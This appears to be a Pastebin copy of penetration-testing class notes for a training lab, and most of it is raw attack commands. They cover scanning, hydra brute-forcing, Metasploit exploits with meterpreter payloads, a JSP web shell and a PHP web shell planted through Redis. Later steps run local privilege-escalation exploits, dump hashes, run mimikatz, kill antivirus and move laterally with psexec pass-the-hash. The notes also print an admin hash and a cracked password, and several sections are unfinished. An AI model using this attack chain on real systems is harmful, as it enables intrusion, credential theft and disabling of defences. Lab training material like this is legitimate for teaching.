Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ########################################
- # Advanced Pentester Night School #
- # By Joe McCray of Strategic Security #
- ########################################
- Let's have you connect to the VPN. I wanted to make sure that I did some of the stuff on my local virtual machines because I want you to do the hunting for vulnerable hosts to attack. If I attack the live targets in the lab then I'll end up giving away a lot of the little secrets that I want you to discover.
- So, let's start with some lab fun (just a little bit)...lol. Here are the instructions for connecting to the VPN:
- https://s3.amazonaws.com/infosecaddicts-Files/Strategic-Security-2016-VPN-Info.pdf
- sudo nmap -sP 10.0.0.0/24
- infosecaddicts
- sudo nmap -sL 10.0.0.0/24
- infosecaddicts
- for i in `seq 1 255`; do ping -c1 10.0.0.$i | tr \\n ' ' | awk '/1 received/ {print $2}'; done
- cd ~/toolz
- wget --no-check-certificate https://raw.githubusercontent.com/BenDrysdale/ipcrawl/master/ipcrawl.c
- gcc ipcrawl.c -o ipcrawl
- chmod 777 ipcrawl
- ./ipcrawl 10.0.0.1 10.0.0.254
- wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c
- gcc propecia.c -o propecia
- sudo cp propecia /bin
- infosecaddicts
- propecia 10.0.0 22
- propecia 10.0.0 3389
- nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | grep open
- nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2 " " $3}'
- nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2}' | wc -l
- nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2}'
- nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2}' > ~/labnet-ip-list.txt
- cd ~/toolz
- #################################################
- # Screenshotting the Web Servers in the Network #
- #################################################
- cd ~/toolz/
- mkdir labscreenshots
- cd labscreenshots/
- wget http://download.gna.org/wkhtmltopdf/0.12/0.12.4/wkhtmltox-0.12.4_linux-generic-amd64.tar.xz
- tar xf wkhtmltox-0.12.4_linux-generic-amd64.tar.xz
- cd wkhtmltox/bin/
- sudo cp wkhtmltoimage /usr/local/bin/wkhtmltoimage-i386
- cd ~/toolz/
- git clone git://github.com/SpiderLabs/Nmap-Tools.git
- cd Nmap-Tools/NSE/
- sudo cp http-screenshot.nse /usr/share/nmap/scripts/
- infosecaddicts
- sudo nmap --script-updatedb
- infosecaddicts
- cd ~/toolz/labscreenshots/
- sudo nmap -Pn -T 5 -p 80 -A --script=http-screenshot 10.0.0.0/24 -iL /home/infosecaddicts/labnet-ip-list.txt
- infosecaddicts
- vi screenshots.sh
- #!/bin/bash
- printf "<HTML><BODY><BR>" > labnet-port-80-screenshots.html
- ls -1 *.png | awk -F : '{ print $1":"$2"\n<BR><IMG SRC=\""$1"%3A"$2"\" width=400><BR><BR>"}' >> labnet-port-80-screenshots.html
- printf "</BODY></HTML>" >> labnet-port-80-screenshots.html
- sh screenshots.sh
- ##########################
- # Nmap NSE tricks to try #
- ##########################
- sudo nmap -Pn -n --open -p21 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 10.0.0.0/24
- infosecaddicts
- sudo nmap -Pn -n --open -p22 --script=sshv1,ssh2-enum-algos 10.0.0.0/24
- infosecaddicts
- sudo nmap -Pn -n -sU --open -p53 --script=dns-blacklist,dns-cache-snoop,dns-nsec-enum,dns-nsid,dns-random-srcport,dns-random-txid,dns-recursion,dns-service-discovery,dns-update,dns-zeustracker,dns-zone-transfer 10.0.0.0/24
- infosecaddicts
- sudo nmap -Pn -n --open -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo 10.0.0.0/24
- infosecaddicts
- sudo nmap -Pn -n --open -p445 --script=msrpc-enum,smb-enum-domains,smb-enum-groups,smb-enum-processes,smb-enum-sessions,smb-enum-shares,smb-enum-users,smb-mbenum,smb-os-discovery,smb-security-mode,smb-server-stats,smb-system-info,smbv2-enabled,stuxnet-detect 10.0.0.0/24
- infosecaddicts
- sudo nmap -Pn -n --open -p1433 --script=ms-sql-dump-hashes,ms-sql-empty-password,ms-sql-info 10.0.0.0/24
- infosecaddicts
- sudo nmap -Pn -n --open -p1521 --script=oracle-sid-brute --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt 10.0.0.0/24
- infosecaddicts
- sudo nmap -Pn -n --open -p3306 --script=mysql-databases,mysql-empty-password,mysql-info,mysql-users,mysql-variables 10.0.0.0/24
- infosecaddicts
- sudo nmap -Pn -n --open -p3389 --script=rdp-vuln-ms12-020,rdp-enum-encryption 10.0.0.0/24
- infosecaddicts
- sudo nmap -Pn -n --open -p5900 --script=realvnc-auth-bypass,vnc-info 10.0.0.0/24
- infosecaddicts
- sudo nmap -Pn -n --open -p6000-6005 --script=x11-access 10.0.0.0/24
- infosecaddicts
- sudo nmap -Pn -n --open -p27017 --script=mongodb-databases,mongodb-info 10.0.0.0/24
- infosecaddicts
- #########################
- # Building a quick list #
- #########################
- cd ~
- echo bob >> list.txt
- echo jim >> list.txt
- echo joe >> list.txt
- echo tim >> list.txt
- echo admin >> list.txt
- echo hello >> list.txt
- echo rob >> list.txt
- echo test >> list.txt
- echo aaaaaa >> list.txt
- echo larry >> list.txt
- echo mario >> list.txt
- echo jason >> list.txt
- echo john >> list.txt
- ##############
- # Using Nmap #
- ##############
- ******** NOTE: Some of these scans may take up to an hour to run... ********
- ******** NOTE: Open them in another terminal window and keep going ********
- sudo nmap -Pn -sSV -A -p- -T5 10.0.0.120 (long scan)
- sudo nmap -sV -Pn -p25 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 10.0.0.120
- sudo nmap -sV -Pn -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo 10.0.0.120
- sudo nmap -sV -Pn -p80,8080,8081,9000 --script=http-* 10.0.0.120 (long scan)
- sudo nmap -sV -Pn -p1322,59894 --script=sshv1,ssh2-enum-algos 10.0.0.120
- ******** NOTE: Some of these scans may take up to an hour to run... ********
- ******** NOTE: Open them in another terminal window and keep going ********
- #########################
- # Playing with Nmap NSE #
- #########################
- nmap -Pn -p80 --script ip-geolocation-* infosecaddicts.com
- nmap -p80 --script dns-brute infosecaddicts.com
- nmap --script http-robtex-reverse-ip secore.info
- nmap -Pn -p80 --script=http-headers infosecaddicts.com
- ls /usr/share/nmap/scripts | grep http
- nmap -Pn -p80 --script=http-* infosecaddicts.com
- #####################################
- # Writing Your Own Nmap NSE Scripts #
- #####################################
- ----------------------------------------------------------------------
- sudo vi /usr/share/nmap/scripts/intro-nse.nse
- -- The Head Section --
- -- The Rule Section --
- portrule = function(host, port)
- return port.protocol == "tcp"
- and port.number == 80
- and port.state == "open"
- end
- -- The Action Section --
- action = function(host, port)
- return "February class bundle!"
- end
- ----------------------------------------------------------------------
- - Ok, now that we've made that change let's run the script
- sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse infosecaddicts.com -p 22,80,443
- ----------------------------------------------------------------------
- sudo vi /usr/share/nmap/scripts/intro-nse.nse
- -- The Head Section --
- local shortport = require "shortport"
- -- The Rule Section --
- portrule = shortport.http
- -- The Action Section --
- action = function(host, port)
- return "February class bundle!"
- end
- ----------------------------------------------------------------------
- - Ok, now that we've made that change let's run the script
- sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse infosecaddicts.com -p 22,80,443
- OK, now let's have some fun with my buddy Carlos Perez's website which you should have been looking at quite a lot if you were trying to get Ruby 2.1.5 working last year.
- ----------------------------------------------------------------------
- sudo vi /usr/share/nmap/scripts/intro-nse.nse
- -- The Head Section --
- local shortport = require "shortport"
- local http = require "http"
- -- The Rule Section --
- portrule = shortport.http
- -- The Action Section --
- action = function(host, port)
- local uri = "/installing-metasploit-in-ubunt/"
- local response = http.get(host, port, uri)
- return response.status
- end
- ----------------------------------------------------------------------
- - Ok, now that we've made that change let's run the script
- sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
- ----------------------------------------------------------------------
- sudo vi /usr/share/nmap/scripts/intro-nse.nse
- -- The Head Section --
- local shortport = require "shortport"
- local http = require "http"
- -- The Rule Section --
- portrule = shortport.http
- -- The Action Section --
- action = function(host, port)
- local uri = "/installing-metasploit-in-ubunt/"
- local response = http.get(host, port, uri)
- if ( response.status == 200 ) then
- return response.body
- end
- end
- ----------------------------------------------------------------------
- - Ok, now that we've made that change let's run the script
- sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
- ----------------------------------------------------------------------
- sudo vi /usr/share/nmap/scripts/intro-nse.nse
- -- The Head Section --
- local shortport = require "shortport"
- local http = require "http"
- local string = require "string"
- -- The Rule Section --
- portrule = shortport.http
- -- The Action Section --
- action = function(host, port)
- local uri = "/installing-metasploit-in-ubunt/"
- local response = http.get(host, port, uri)
- if ( response.status == 200 ) then
- local title = string.match(response.body, "Installing Metasploit in Ubuntu and Debian")
- return title
- end
- end
- ----------------------------------------------------------------------
- - Ok, now that we've made that change let's run the script
- sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
- ----------------------------------------------------------------------
- sudo vi /usr/share/nmap/scripts/intro-nse.nse
- -- The Head Section --
- local shortport = require "shortport"
- local http = require "http"
- local string = require "string"
- -- The Rule Section --
- portrule = shortport.http
- -- The Action Section --
- action = function(host, port)
- local uri = "/installing-metasploit-in-ubunt/"
- local response = http.get(host, port, uri)
- if ( response.status == 200 ) then
- local title = string.match(response.body, "Installing Metasploit in Ubuntu and Debian")
- if (title) then
- return "Vulnerable"
- else
- return "Not Vulnerable"
- end
- end
- end
- ----------------------------------------------------------------------
- - Ok, now that we've made that change let's run the script
- sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
- ******** Attacking Kevgir ********
- I figured I've give you something fun to play with.
- ###############
- # Using Nikto #
- ###############
- cd ~/toolz/nikto-2.1.1
- perl nikto.pl -update
- perl nikto.pl -h 10.0.0.120
- perl nikto.pl -h 10.0.0.120:8080
- perl nikto.pl -h 10.0.0.120:8081
- perl nikto.pl -h 10.0.0.120:9000
- ####################
- # Using Metasploit #
- ####################
- cd ~/toolz/metasploit
- ./msfconsole
- use auxiliary/scanner/http/http_version
- set RHOSTS 10.0.0.120
- set RPORT 8080
- run
- -------------------------------
- use auxiliary/scanner/http/tomcat_enum
- set RHOSTS 10.0.0.120
- set RPORT 8080
- run
- ####################
- # Attacking Tomcat #
- ####################
- cd ~/toolz/metasploit
- ./msfconsole
- use auxiliary/scanner/http/http_version
- set RHOSTS 10.0.0.120
- set RPORT 8080
- run
- use auxiliary/scanner/http/tomcat_mgr_login
- set USERNAME tomcat
- set USERPASS_FILE /home/infosecaddicts/list.txt
- set STOP_ON_SUCCESS true
- set RHOSTS 10.0.0.120
- set RPORT 8080
- run
- use exploit/multi/http/tomcat_mgr_upload
- set USERNAME tomcat
- set PASSWORD tomcat
- set RHOST 10.0.0.120
- set RPORT 8080
- set PATH /manager/html
- set PAYLOAD java/meterpreter/bind_tcp
- exploit
- run post/linux/gather/checkvm
- run post/linux/gather/enum_configs
- run post/linux/gather/enum_protections
- run post/linux/gather/enum_system
- run post/linux/gather/enum_users_history
- run post/linux/gather/hashdump
- shell
- /bin/bash
- id
- uname -a
- dpkg -l
- cd /tmp
- pwd
- cat >> exploit.c << out
- **************paste in the content from here *****************
- https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/39166.c
- ------ hit enter a few times ------
- ------ then type 'out' ----- this closes the file handle...
- gcc -o boom exploit.c
- ./boom
- id
- -------------------------------
- hydra -l tomcat -P /home/infosecaddicts/list.txt -e ns -s 8080 -vV 10.0.0.140 http-get /manager/html
- -------------------------------------------index.jsp-------------------------------------------
- <FORM METHOD=GET ACTION='index.jsp'>
- <INPUT name='cmd' type=text>
- <INPUT type=submit value='Run'>
- </FORM>
- <%@ page import="java.io.*" %>
- <%
- String cmd = request.getParameter("cmd");
- String output = "";
- if(cmd != null) {
- String s = null;
- try {
- Process p = Runtime.getRuntime().exec(cmd,null,null);
- BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
- while((s = sI.readLine()) != null) { output += s+"</br>"; }
- } catch(IOException e) { e.printStackTrace(); }
- }
- %>
- <pre><%=output %></pre>
- -------------------------------------------index.jsp-------------------------------------------
- ***** now pack the webshell *****
- mkdir webshell
- cp index.jsp webshell
- cd webshell
- jar -cvf ../webshell.war *
- Deploy the WAR file using the built-in deploy option on the manager web-page.
- Once the WAR file is deployed I simply browse to the URL I deployed the WAR file
- now upload the webshell.war. After uploading, visit page: http://10.0.0.120:8080/webshell/
- ****** This section isn't finished ******
- cd ~/toolz/metasploit
- ./msfvenom -p linux/x86/shell_bind_tcp LPORT="7777" -f war > /home/infosecaddicts/bind7777.war
- jar tf ~/bind7777.war
- ****** This section isn't finished ******
- Google is your friend hahahahahahahah........
- #################
- # Attacking FTP #
- #################
- sudo nmap -sV -Pn -p25 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 10.0.0.120
- cd ~/toolz/hydra
- hydra -l admin -P /home/infosecaddicts/list.txt -u -s 25 10.0.0.120 ftp
- ftp
- open 10.0.0.120
- admin
- admin
- pwd
- ls -lah
- ls ../../
- #################
- # Attacking SSH #
- #################
- cd ~/toolz/hydra
- hydra -L /home/infosecaddicts/list.txt -P /home/infosecaddicts/list.txt -u -s 1322 10.0.0.120 ssh
- ssh -p 1322 admin@10.0.0.120
- cd ~/toolz/metasploit
- ./msfconsole
- use auxiliary/scanner/ssh/ssh_users
- set USER_FILE /home/infosecaddicts/list.txt
- set STOP_ON_SUCCESS true
- set RHOSTS 10.0.0.120
- set RPORT 1322
- run
- use auxiliary/scanner/ssh/ssh_login
- set USER_FILE /home/infosecaddicts/list.txt
- set PASS_FILE /home/infosecaddicts/list.txt
- set STOP_ON_SUCCESS true
- set RHOSTS 10.0.0.120
- set RPORT 1322
- run
- sessions -l
- sessions -u 1
- sessions -i 1
- id
- ########################
- # Attacking phpMyAdmin #
- ########################
- ****** This section isn't finished ******
- hydra -l root -P /home/infosecaddicts/list.txt -e n http-post-form://10.0.0.120 -m "/phpMyAdmin/index.php:pma_username=^USER^&pma_password=^PASS^&server=1:S=information_schema"
- ****** This section isn't finished ******
- Google is your friend hahahahahahahah........
- wget https://repo.palkeo.com/repositories/mysterie.fr/prog/darkc0de/others/pmabf.py
- python pmabf.py http://10.0.0.120 root list.txt (this gave me the WRONG password)
- ####################
- # Attacking Joomla #
- ####################
- cd ~/toolz/metasploit
- ./msfconsole
- use use auxiliary/scanner/http/joomla_plugins
- set RHOSTS 10.0.0.120
- set RPORT 8080
- run
- ****** This section isn't finished ******
- Google is your friend hahahahahahahah........
- #####################
- # Attacking Jenkins #
- #####################
- ****** This section isn't finished ******
- Google is your friend hahahahahahahah........
- #################
- # Attacking NFS #
- #################
- rpcinfo -s 10.0.0.120
- showmount -e 10.0.0.120
- mount -t nfs 10.0.0.120:/backup /tmp/nfs -o nolock
- ls /tmp/nfs
- cp /tmp/nfs/backup.tar.bz2.zip /home/infosecaddicts
- umount -l /tmp/nfs
- sudo apt-cache search fcrackzip
- sudo apt-get install -y fcrackzip
- fcrackzip -D -p /home/infosecaddicts/list.txt
- unzip -P aaaaaa backup.tar.bz2.zip
- tar -zxvf backup.tar.bz2
- ###################
- # Attacking Redis #
- ###################
- sudo nmap -p 6379 --script=redis-info 10.0.0.120
- infosecaddicts
- sudo apt-get install -y redis-tools
- infosecaddicts
- redis-cli -h 10.0.0.120
- CONFIG SET dir /var/www/html/main
- CONFIG GET dir
- config set dbfilename bomba.php
- CONFIG GET dbfilename
- SET cmd "<?php system($_GET['joe']); ?>"
- BGSAVE
- http://10.0.0.120/bomba.php
- http://10.0.0.120/bomba.php?joe=id
- (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt/.ssh"
- ****** This section isn't finished ******
- Google is your friend hahahahahahahah........
- cd ~/toolz/metasploit
- ./msfconsole
- use auxiliary/scanner/redis/file_upload
- set RHOSTS 10.0.0.120
- set LocalFile
- ****** This section isn't finished ******
- ####################################
- # Finally, let's exploit something #
- ####################################
- nmap -Pn -sV -T 5 -oG - -p 80,8080 10.0.0.* | awk '/open/{print $2}'
- nmap -Pn -sV -T 5 -p 80,8080 10.0.0.15
- https://www.exploit-db.com/search
- Search for:
- Savant httpd 3.1
- Apache httpd 2.0.58 ((Win32))
- Found one written in Python:
- https://www.exploit-db.com/exploits/18401/
- Found one for Savant 3.1 from Metasploit:
- https://www.exploit-db.com/exploits/16770/
- cd ~/toolz/metasploit
- ./msfconsole
- use exploit/windows/http/savant_31_overflow
- set RHOST 10.0.0.15
- set PAYLOAD windows/meterpreter/bind_nonx_tcp
- set RPORT 80
- set LPORT 7777
- exploit
- ********************************** Figure out who and where you are **********************************
- meterpreter> sysinfo
- meterpreter> getuid
- meterpreter> ipconfig
- meterpreter> run post/windows/gather/checkvm
- meterpreter> run get_local_subnets
- ********************************** Escalate privileges and get hashes **********************************
- meterpreter> use priv
- meterpreter > getsystem
- ...got system (via technique 1).
- meterpreter > getuid
- Server username: NT AUTHORITY\SYSTEM
- --------------------------------------------------------
- meterpreter> run killav
- meterpreter> run post/windows/gather/hashdump
- Got the following admin hash:
- Administrator:500:6e0b0669e734d66b310cc3b8f65453da:8a2b05f1b6111fe3d642bb43e1c0c363:::
- meterpreter> run post/windows/gather/credentials/credential_collector
- meterpreter > load mimikatz
- meterpreter > kerberos
- This should give me the administrative password:
- )K5?Jocb(Yx
- ********************************** Enumerate the host you are on **********************************
- meterpreter> run winenum
- meterpreter > run post/windows/gather/enum_applications
- meterpreter > run post/windows/gather/enum_logged_on_users
- meterpreter > run post/windows/gather/usb_history
- meterpreter > run post/windows/gather/enum_shares
- meterpreter > run post/windows/gather/enum_snmp
- meterpreter> reg enumkey -k HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
- ********************************** Get out of Meterpreter **********************************
- meterpreter> background
- msf exploit(savant_31_overflow) > back
- msf>
- ********************************** Lateral Movement *******************************
- Now we can run the PSEXEC exploit.
- -- Option 1:
- use exploit/windows/smb/psexec
- set SMBUser Administrator
- set SMBPass )K5?Jocb(Yx
- set RHOST 10.0.0.15
- set payload windows/meterpreter/bind_tcp
- set LPORT 2345
- exploit
- ********************************** Get out of Meterpreter **********************************
- meterpreter> background
- msf exploit(psexec) >back
- msf>
- **********************************
- -- Option 2:
- use exploit/windows/smb/psexec
- set SMBUser Administrator
- set SMBPass 6e0b0669e734d66b310cc3b8f65453da:8a2b05f1b6111fe3d642bb43e1c0c363
- set payload windows/meterpreter/bind_tcp
- set RHOST 10.0.0.15
- set LPORT 5678
- exploit
- ********************************** Set up your Pivot **********************************
- meterpreter > background
- <-- background the session
- You want to get back to this prompt:
- msf exploit(handler) > back <--- you need to get to main msf> prompt
- sessions -l <--find a session you want to pivot through (note the IP and session number)
- Now set up Pivot with a route add
- ---------------------------------
- route print <--- should be blank
- route add 10.0.0.15 255.255.255.0 1 <-- Use correct session id (2), it may be 3, or 4 (make sure you are on msf> prommpt, not meterpreter)
- route print <----- verify new route
- ******************************Scan through your Pivot ******************************
- use auxiliary/scanner/portscan/tcp <-- Run aux modules through your pivot
- set THREADS 10
- set RHOSTS 10.0.0.0/24 <-- Keep changing this IP and re-running the scan until you find something you want to attack
- set PORTS 445
- run
- ####################################
- # Socks Tunneling with Proxychains #
- ####################################
- --- Open a duplicate putty session to your Ubuntu host
- sudo apt-get install -y proxychains
- infosecaddicts
- sudo vi /etc/proxychains.conf <--- Make sure that last line of the file is: socks4 127.0.0.1 1080
- infosecaddicts
- Comment out the proxy_dns, change the 9050 (tor port) to the metasploit socks proxy port (1080) and save it.
- socks4 127.0.0.1 1080
- ***************************Set up a Socks Proxy through your Pivot *************************
- use auxiliary/server/socks4a
- set SRVHOST 127.0.0.1
- set SRVPORT 1080
- run
- --- Go back to your other putty session with the meterpreter shell
- cd ~
- proxychains nmap -sT -PN -vv -sV --script=smb-os-discovery.nse -p 445 192.168.153.0/24 <--- This is going to be really slow
- proxychains nmap -sT -PN -n -sV -p 21,22,23,25,80,110,139,443,1433,1521,3306,3389,8080,10000 10.0.0/24 <--- This is going to be really slow
- ---close the duplicate putty session to your Ubuntu host
Add Comment
Please, Sign In to add comment